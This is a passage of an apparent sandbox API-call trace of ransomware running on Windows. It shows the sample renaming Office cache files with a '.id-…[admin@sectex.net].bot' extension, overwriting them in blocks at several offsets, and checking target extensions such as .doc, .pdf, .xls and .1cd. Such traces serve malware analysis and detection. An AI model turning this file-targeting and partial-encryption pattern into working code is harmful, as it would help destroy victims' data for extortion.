	[0042.886] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0043.269] SetEndOfFile (hFile=0x188) returned 1
	[0043.269] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb453090
	[0043.273] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.273] WriteFile (in: hFile=0x188, lpBuffer=0xb453090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb453090*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.275] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.275] WriteFile (in: hFile=0x188, lpBuffer=0xb453090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb453090*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.278] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.278] WriteFile (in: hFile=0x188, lpBuffer=0xb453090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb453090*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.281] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb453090 | out: hHeap=0x7d60000) returned 1
	[0043.281] CloseHandle (hObject=0x188) returned 1
	[0043.919] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0043.919] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.919] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.919] lstrlenW (lpString=".doc") returned 4
	[0043.919] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString=".docx") returned 5
	[0043.919] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0043.919] lstrlenW (lpString=".pdf") returned 4
	[0043.919] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString=".xls") returned 4
	[0043.919] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString=".xlsx") returned 5
	[0043.919] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0043.919] lstrlenW (lpString=".ppt") returned 4
	[0043.919] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.919] lstrlenW (lpString=".zip") returned 4
	[0043.919] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString=".rar") returned 4
	[0043.919] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0043.919] lstrlenW (lpString=".bz2") returned 4
	[0043.919] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0043.919] lstrlenW (lpString=".7z") returned 3
	[0043.919] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0043.919] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.919] lstrlenW (lpString=".dbf") returned 4
	[0043.920] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.920] lstrlenW (lpString=".1cd") returned 4
	[0043.920] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0043.920] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.920] lstrlenW (lpString=".jpg") returned 4
	[0043.920] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.920] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.920] lstrlenW (lpString=".doc") returned 4
	[0043.920] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString=".docx") returned 5
	[0043.920] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0043.920] lstrlenW (lpString=".pdf") returned 4
	[0043.920] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString=".xls") returned 4
	[0043.920] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString=".xlsx") returned 5
	[0043.920] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0043.920] lstrlenW (lpString=".ppt") returned 4
	[0043.920] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.920] lstrlenW (lpString=".zip") returned 4
	[0043.920] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString=".rar") returned 4
	[0043.920] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0043.920] lstrlenW (lpString=".bz2") returned 4
	[0043.920] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0043.921] lstrlenW (lpString=".7z") returned 3
	[0043.921] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0043.921] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.921] lstrlenW (lpString=".dbf") returned 4
	[0043.921] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0043.921] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.921] lstrlenW (lpString=".1cd") returned 4
	[0043.921] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0043.921] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72
	[0043.921] lstrlenW (lpString=".jpg") returned 4
	[0043.921] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0043.921] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0043.921] lstrlenW (lpString="VisioMUI.msi") returned 12
	[0043.921] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0043.922] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=2797568) returned 1
	[0043.922] CloseHandle (hObject=0x188) returned 1
	[0043.922] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020
	[0043.922] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.922] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0043.922] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0043.922] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0043.922] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.922] ReadFile (in: hFile=0x188, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.928] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.928] ReadFile (in: hFile=0x188, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.936] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0043.936] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.937] ReadFile (in: hFile=0x188, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.951] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.951] WriteFile (in: hFile=0x188, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0044.227] SetEndOfFile (hFile=0x188) returned 1
	[0044.227] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0044.243] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.243] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.244] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.244] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.250] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.250] WriteFile (in: hFile=0x188, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.252] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0044.252] CloseHandle (hObject=0x188) returned 1
	[0044.252] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.252] lstrlenW (lpString=".doc") returned 4
	[0044.252] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.252] lstrlenW (lpString=".docx") returned 5
	[0044.252] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.252] lstrlenW (lpString=".pdf") returned 4
	[0044.252] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.252] lstrlenW (lpString=".xls") returned 4
	[0044.252] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.252] lstrlenW (lpString=".xlsx") returned 5
	[0044.252] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.252] lstrlenW (lpString=".ppt") returned 4
	[0044.252] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".zip") returned 4
	[0044.253] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString=".rar") returned 4
	[0044.253] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString=".bz2") returned 4
	[0044.253] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.253] lstrlenW (lpString=".7z") returned 3
	[0044.253] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".dbf") returned 4
	[0044.253] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".1cd") returned 4
	[0044.253] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".jpg") returned 4
	[0044.253] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".doc") returned 4
	[0044.253] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.253] lstrlenW (lpString=".docx") returned 5
	[0044.253] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.253] lstrlenW (lpString=".pdf") returned 4
	[0044.253] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString=".xls") returned 4
	[0044.253] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString=".xlsx") returned 5
	[0044.253] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.253] lstrlenW (lpString=".ppt") returned 4
	[0044.253] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.253] lstrlenW (lpString=".zip") returned 4
	[0044.254] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.254] lstrlenW (lpString=".rar") returned 4
	[0044.254] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.254] lstrlenW (lpString=".bz2") returned 4
	[0044.254] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.254] lstrlenW (lpString=".7z") returned 3
	[0044.254] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.254] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.254] lstrlenW (lpString=".dbf") returned 4
	[0044.254] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.254] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.254] lstrlenW (lpString=".1cd") returned 4
	[0044.254] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.254] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75
	[0044.254] lstrlenW (lpString=".jpg") returned 4
	[0044.254] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.254] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0044.254] lstrlenW (lpString="ProjectMUI.msi") returned 14
	[0044.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0044.259] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=2511872) returned 1
	[0044.259] CloseHandle (hObject=0x170) returned 1
	[0044.259] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020
	[0044.259] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.259] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.259] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0044.260] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.260] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.260] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.264] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.264] ReadFile (in: hFile=0x170, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.274] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.274] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.274] ReadFile (in: hFile=0x170, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.578] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.578] WriteFile (in: hFile=0x170, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0044.595] SetEndOfFile (hFile=0x170) returned 1
	[0044.595] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb462760
	[0044.598] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.598] WriteFile (in: hFile=0x170, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.600] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.600] WriteFile (in: hFile=0x170, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.740] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.740] WriteFile (in: hFile=0x170, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.743] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb462760 | out: hHeap=0x7d60000) returned 1
	[0044.746] CloseHandle (hObject=0x170) returned 1
	[0044.746] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.747] lstrlenW (lpString=".doc") returned 4
	[0044.747] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.747] lstrlenW (lpString=".docx") returned 5
	[0044.747] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.747] lstrlenW (lpString=".pdf") returned 4
	[0044.747] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.747] lstrlenW (lpString=".xls") returned 4
	[0044.747] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.747] lstrlenW (lpString=".xlsx") returned 5
	[0044.747] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.747] lstrlenW (lpString=".ppt") returned 4
	[0044.747] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.747] lstrlenW (lpString=".zip") returned 4
	[0044.747] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.747] lstrlenW (lpString=".rar") returned 4
	[0044.747] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.747] lstrlenW (lpString=".bz2") returned 4
	[0044.747] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.747] lstrlenW (lpString=".7z") returned 3
	[0044.747] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".dbf") returned 4
	[0044.748] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".1cd") returned 4
	[0044.748] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
	[0044.748] lstrlenW (lpString=".jpg") returned 4
	[0044.748] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77
